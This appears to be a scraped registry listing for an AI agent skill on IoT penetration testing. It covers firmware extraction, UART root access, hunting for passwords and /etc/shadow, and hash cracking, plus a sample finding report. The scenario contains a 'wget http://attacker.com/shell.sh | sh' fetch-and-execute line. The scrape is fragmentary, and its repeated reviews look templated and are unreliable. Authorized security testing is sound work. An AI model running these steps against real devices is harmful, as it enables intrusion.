Performs comprehensive security assessments of IoT devices and their ecosystems by testing hardware interfaces, firmware, network communications, cloud APIs, and companion mobile applications. The tester uses firmware extraction and analysis, hardware debugging via UART and JTAG, network protocol analysis, and runtime exploitation to identify vulnerabilities across all layers of the IoT stack. Activates for requests involving IoT security testing, embedded device assessment, firmware security analysis, or smart device penetration testing.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionperforming-iot-security-assessmentExecute the skills CLI command in your project's root directory to begin installation:
Fetches performing-iot-security-assessment from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate performing-iot-security-assessment. Access via /performing-iot-security-assessment in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | performing-iot-security-assessment |
| description | 'Performs comprehensive security assessments of IoT devices and their ecosystems by testing hardware interfaces, firmware, network communications, cloud APIs, and companion mobile applications. The tester uses firmware extraction and analysis, hardware debugging via UART and JTAG, network protocol analysis, and runtime exploitation to identify vulnerabilities across all layers of the IoT stack. Activates for requests involving IoT security testing, embedded device assessment, firmware security analysis, or smart device penetration testing. ' |
| domain | cybersecurity |
| subdomain | penetration-testing |
| tags | - IoT-security - firmware-analysis - embedded-systems - hardware-hacking - UART-JTAG |
| version | 1.0.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - ID.RA-01 - ID.RA-06 - GV.OV-02 - DE.AE-07 |
Do not use against IoT devices without written authorization, for modifying firmware on devices you do not own, or against medical devices or safety-critical systems without specific medical device testing authorization and safety protocols.
Examine the physical device and identify attack surfaces:
Extract and analyze the device firmware:
flashrom -p ch341a_spi -r firmware.binmd.b memory dump)binwalk -e firmware.bin to extract filesystem, kernel, and bootloader componentsgrep -rn "password\|passwd\|secret\|key" squashfs-root//etc/shadow for password hashes/etc/init.d/ for insecure service configurations./firmwalker.sh squashfs-root/ for automated sensitive data discoveryfirmware-analysis-toolkit for automated CVE scanning.Analyze all network traffic from the IoT device:
Emulate the firmware for dynamic security testing:
python3 fat.py firmware.bin to boot the firmware in an emulated environmentExploit identified vulnerabilities to demonstrate impact:
| Term | Definition |
|---|---|
| UART | Universal Asynchronous Receiver/Transmitter; a serial communication interface commonly used for debug consoles on embedded devices, often providing root shell access |
| JTAG | Joint Test Action Group; a hardware debugging interface that provides direct access to the processor for memory reading, code debugging, and firmware extraction |
| Firmware | The software embedded in the device's flash memory that controls its operation, typically consisting of a bootloader, operating system kernel, and root filesystem |
| Binwalk | A firmware analysis tool that identifies and extracts embedded file systems, compressed archives, and binary components from firmware images |
| MQTT | Message Queuing Telemetry Transport; a lightweight publish/subscribe protocol commonly used for IoT device communication, often deployed without authentication |
| BLE | Bluetooth Low Energy; a wireless protocol used by many IoT devices for short-range communication, susceptible to eavesdropping and unauthorized access if not properly secured |
Context: A company plans to deploy 200 IP cameras from a single vendor across its offices. Before deployment, the security team requests a penetration test of the camera to identify vulnerabilities that could be exploited to gain access to the corporate network.
Approach:
/etc/shadow (root:$1$abc$hashedpassword) and crack the MD5 hash in seconds (password: camera123); wget http://attacker.com/shell.sh | shPitfalls:
## Finding: Unauthenticated Root Shell via UART Debug Interface
**ID**: IOT-001
**Severity**: Critical (CVSS 9.0)
**Device**: ModelCam X200 IP Camera (Firmware v3.2.1)
**Interface**: UART serial console (115200 baud, 8N1)
**Description**:
The IP camera exposes a UART serial interface on the PCB that provides
direct root shell access without authentication. An attacker with physical
access to the device can connect a USB-to-UART adapter and obtain full
root access to the embedded Linux operating system.
**Proof of Concept**:
1. Opened device enclosure (4 Philips screws, no tamper detection)
2. Connected FTDI adapter to UART pins (J3 header on PCB)
3. Serial terminal at 115200 8N1: immediate root shell prompt
4. root@camera:~# id -> uid=0(root) gid=0(root)
**Additional Findings from Root Access**:
- /etc/shadow contains hardcoded root password (camera123) shared across all units
- WiFi credentials for any configured network stored in plaintext at /etc/wireless.conf
- RTSP stream accessible without authentication on port 554
**Impact**:
Physical access to any deployed camera grants root access to the network.
With 200 cameras deployed across offices, each camera becomes a potential
network entry point with root-level command execution capability.
**Remediation**:
1. Disable UART console access or require authentication in production firmware
2. Remove hardcoded credentials; use per-device unique passwords generated at manufacture
3. Encrypt stored WiFi credentials using a hardware-backed key
4. Deploy cameras on an isolated VLAN with no access to the corporate network
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Useful defaults in performing-iot-security-assessment — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Keeps context tight: performing-iot-security-assessment is the kind of skill you can hand to a new teammate without a long onboarding doc.
Registry listing for performing-iot-security-assessment matched our evaluation — installs cleanly and behaves as described in the markdown.
performing-iot-security-assessment reduced setup friction for our internal harness; good balance of opinion and flexibility.
performing-iot-security-assessment is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
performing-iot-security-assessment reduced setup friction for our internal harness; good balance of opinion and flexibility.
performing-iot-security-assessment reduced setup friction for our internal harness; good balance of opinion and flexibility.
performing-iot-security-assessment fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
performing-iot-security-assessment has been reliable in day-to-day use. Documentation quality is above average for community skills.
performing-iot-security-assessment fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
showing 1-10 of 27